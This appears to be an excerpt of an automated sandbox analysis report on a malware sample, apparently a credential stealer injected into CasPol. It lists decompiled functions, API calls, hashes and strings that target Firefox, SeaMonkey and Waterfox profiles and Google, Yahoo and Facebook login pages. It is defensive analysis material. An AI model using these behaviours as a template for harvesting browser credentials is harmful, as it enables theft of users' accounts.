                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                    • API String ID: 2936932814-4196376884
                                                                                                                                                                                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                    Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                    • API String ID: 4039892925-11920434
                                                                                                                                                                                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                    Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                    • API String ID: 4039892925-2068335096
                                                                                                                                                                                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                    Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                    • API String ID: 4039892925-3369679110
                                                                                                                                                                                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                    Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                                                                                                    • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                    Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                    • String ID: $0.@
                                                                                                                                                                                    • API String ID: 2758756878-1896041820
                                                                                                                                                                                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                    Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2941347001-0
                                                                                                                                                                                    • Opcode ID: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                                                                                                                                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                    Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: advapi32.dll
                                                                                                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                                                                                                    • Opcode ID: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                                                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                    Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                    • API String ID: 1534475566-1174173950
                                                                                                                                                                                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                    Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 669240632-0
                                                                                                                                                                                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                    Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                    • API String ID: 71295984-2036018995
                                                                                                                                                                                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                    Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                    • String ID: "%s"
                                                                                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                                                                                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                    Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CCF
                                                                                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                    • API String ID: 1714573020-3385500049
